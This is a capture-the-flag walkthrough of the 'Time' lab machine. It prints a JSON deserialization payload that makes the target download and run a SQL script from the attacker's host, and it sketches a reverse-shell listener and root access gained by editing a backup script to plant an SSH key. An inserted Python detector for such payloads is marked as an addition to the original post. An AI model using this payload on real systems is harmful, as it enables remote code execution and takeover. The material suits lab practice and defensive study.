In this post, I would like to share a walkthrough of the TIME Machine.


This room is rated as a MEDIUM difficulty machine.


Once we have started the VPN connection, we can begin information gathering on the machine by running the command nmap -sC -sV <IP Address> -PN

Information Gathering on the Time machine


Let’s open the browser and go straight to the website interface.


We are directed to the Online JSON interface. Let’s test the website by typing anything with the status set to Validate (beta!).


Let’s do some research on the errors that appear above.


After some research on the internet, I found a script that can be used for exploitation on the website.


The code that we can use for the exploitation looks like this:

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://<attacker's ip>:8080/<filename>.sql'"}]

Exploiting the application with JSON code
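Seen from the defending side, the payload above has two recognisable features: a two-element array of [class name, properties] used as a type hint, and an H2 JDBC URL carrying an INIT= option. The sketch below flags request bodies with either feature before they reach the JSON parser. It is an added example, not code from the original post; the allowlist, function names and sample bodies are assumptions, and the sample host and file name are constructed placeholders.

```python
import json
import re

# Assumption: types the application legitimately accepts (hypothetical allowlist).
ALLOWED_TYPES = {"java.util.ArrayList", "java.util.HashMap"}

# Fully qualified Java class name, e.g. ch.qos.logback.core.db.DriverManagerConnectionSource
CLASS_NAME = re.compile(r"^(?:[a-z_][\w$]*\.)+[A-Z_$][\w$]*$")
# H2 JDBC URL whose INIT= option makes the database run SQL at connect time
JDBC_INIT = re.compile(r"jdbc:h2:[^\"']*;\s*INIT\s*=", re.IGNORECASE)


def findings(node, path="$"):
    """Yield (path, reason) for each suspicious construct in a parsed JSON value."""
    if isinstance(node, list):
        # Wrapper-array type hint: ["fully.qualified.Class", {...properties...}]
        if (len(node) == 2 and isinstance(node[0], str)
                and isinstance(node[1], dict) and CLASS_NAME.match(node[0])
                and node[0] not in ALLOWED_TYPES):
            yield path, f"type hint for non-allowlisted class {node[0]}"
        for i, item in enumerate(node):
            yield from findings(item, f"{path}[{i}]")
    elif isinstance(node, dict):
        for key, value in node.items():
            yield from findings(value, f"{path}.{key}")
    elif isinstance(node, str) and JDBC_INIT.search(node):
        yield path, "H2 JDBC URL with INIT= (runs SQL on connect)"


def inspect_body(body):
    """Return findings for one raw request body; unparseable input is reported, not ignored."""
    try:
        return list(findings(json.loads(body)))
    except json.JSONDecodeError:
        return [("$", "body is not valid JSON")]


# Constructed sample bodies (host and file name are placeholders, not values from the page)
SAMPLES = [
    '{"name": "test", "tags": ["a", "b"]}',
    '["ch.qos.logback.core.db.DriverManagerConnectionSource", '
    '{"url": "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;'
    "INIT=RUNSCRIPT FROM 'http://192.0.2.10:8080/placeholder.sql'\"}]",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_body(body) or "clean")
```

A filter like this is a detection aid for logs or a proxy; the durable fix is to stop the parser from instantiating classes named in user input.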


Before clicking Process, we create a new file named <filename>.sql


The code that will be used is shown below:


Let’s start our nc listener in another terminal.


As usual, you will need to access /home/pericles, where you will find user.txt.

Next, let’s go and retrieve the root flag!

Escalate to Root Privileges Access on Time Machine


We need to create an SSH public and private key to access the machine via the SSH service.


You will need to copy your id_rsa code and paste it on the target machine, with an extra command being used here.


The screenshot above shows the actual code that you will paste on the target machine.


The screenshot above shows the target machine.


In the screenshot above, the file timer_backup.sh is the one that we just modified to gain access over the SSH service.


We should get root access after a while.


We can read the root flag by typing the “cat root.txt” command


-THE END-


Happy Learning Guys!